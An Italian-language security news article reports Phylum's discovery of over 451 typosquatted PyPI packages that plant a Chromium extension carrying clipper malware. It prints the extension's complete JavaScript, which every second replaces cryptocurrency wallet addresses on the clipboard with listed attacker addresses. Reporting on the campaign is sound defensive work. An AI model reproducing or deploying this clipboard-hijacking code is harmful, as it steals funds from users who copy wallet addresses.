Scroll Top

Malware Clipper trovato in oltre 451 pacchetti PyPI

I ricercatori di sicurezza di Phylum hanno scoperto oltre 451 pacchetti nel Python Package Index (PyPI) che sono infetti da malware “clipper”.

I clipper sostituiscono il contenuto degli appunti di una vittima con qualcosa che avvantaggia l’aggressore. I clipper più diffusi oggi cercano indirizzi di criptovaluta e li modificano per rubare fondi.

A partire dal 9 febbraio, Phylum è stata avvisata dalla sua piattaforma di rilevamento automatico dei rischi di una lunga serie di pubblicazioni sospette su PyPI. I ricercatori hanno notato che sembrava simile a una precedente campagna scoperta nel novembre 2022, ma con una tecnica di offuscamento aggiornata e un volume “radicalmente aumentato”.

La campagna precedente ha visto gli aggressori pubblicare poco più di due dozzine di pacchetti. Questa volta ci sono oltre 451 pacchetti unici.

“Questo utente malintenzionato ha notevolmente aumentato la propria impronta in pypi attraverso l’automazione”, ha spiegato Phylum.

Entrambe le campagne sfruttano il typosquatting, ovvero un semplice errore di battitura nell’indirizzo di un pacchetto legittimo, per indurre gli sviluppatori a installare versioni dannose.

In questo caso, viene creata un’estensione del browser Chromium che viene caricata automaticamente all’avvio di uno dei browser di destinazione, inclusi Chrome, Edge, Brave e Opera, utilizzando l’opzione della riga di comando “–load-extension”.

Il seguente JavaScript viene quindi scritto nell’estensione che mira a sostituire la crittografia indirizzata con quella controllata dall’attacker:

let page = chrome.extension.getBackgroundPage();

var inputElement = document.createElement(‘input’);

document.body.appendChild(inputElement);

inputElement.focus();

function checkWalletAddresses() {

document.execCommand(‘paste’);

var clipboardContent = inputElement.value;

clipboardContent = clipboardContent.replace(/^(0x)[A-Fa-f0-9]{40}$/g, ‘0x6eb2103839011Ed56c98145b3d3f9d6BE1b4dA63’);

clipboardContent = clipboardContent.replace(/^T[A-Za-z1-9]{33}$/g, ‘TK3dtT7vYLkhUyzLqbQMmsrM36QzFnmfaa’);

clipboardContent = clipboardContent.replace(/^(bnb1)[0-9a-z]{38}$/g, ‘bnb1pncs5ct0rdh3rcdms8708x9jrdy038ml33ceuw’);

clipboardContent = clipboardContent.replace(/^([13]{1}[a-km-zA-HJ-NP-Z1-9]{26,33}|bc1[a-z0-9]{39,59})$/g, ‘bc1qkjm7r677a4fkxcmx9kzlk55a9eaqtztq8zwrc2’);

clipboardContent = clipboardContent.replace(/^[LM3][a-km-zA-HJ-NP-Z1-9]{26,33}$/g, ‘LcVct9KwHwUKftDNjbBxUtjK9WeUkYbRN3’);

clipboardContent = clipboardContent.replace(/^r[0-9a-zA-Z]{24,34}$/g, ‘rJd2pxs7TxE77W8X3Ezt2QyrhMJixMehPx’);

clipboardContent = clipboardContent.replace(/^D{1}[5-9A-HJ-NP-U]{1}[1-9A-HJ-NP-Za-km-z]{32}$/g, ‘DFbEVJUt9TcyBgVGriy3DcNBwYhK3s7Yhx’);

clipboardContent = clipboardContent.replace(/^addr1[a-z0-9]+$/g, ‘addr1q8206rrze22rz8g5lggn4clv7zu9mq6w6a6llvw8v3l7r8k5l5xx9j55xyw3f7s38t37eu9ctkp5a4m4l7cuwerlux0qxlhwvz’);

clipboardContent = clipboardContent.replace(/^[48]([0-9AB]{1})([0-9a-zA-Z]{93})$/g, ’41iwYzbS1KKX8DFySxDcGBGGfJzywUeHxWumm4fjYxtYCiHtysXmq3P7RqG18Tv5UDKGNQegefxS2FFqrqeapvB7FuYSBJv’);

clipboardContent = clipboardContent.replace(/^G[0-7A-Za-z]{55}$/g, ‘GCUPRZDN5RGSO3MC4LBIZBJMCS5KNUYQI2HZNUHVEBC5LNWZODWQ24XH’);

\tclipboardContent = clipboardContent.replace(/^cosmos[a-z0-9]{39}$/g, ‘cosmos1cd3hxdkc775zj75xtd3gqp8s7hynxkzewcf58y’);

inputElement.value = clipboardContent;

inputElement.select();

document.execCommand(‘copy’);

inputElement.value = ”;

}

setInterval(checkWalletAddresses, 1000);

Puoi trovare la ripartizione completa della campagna di Phylum e l’elenco dei pacchetti scoperti qui.

Post Correlati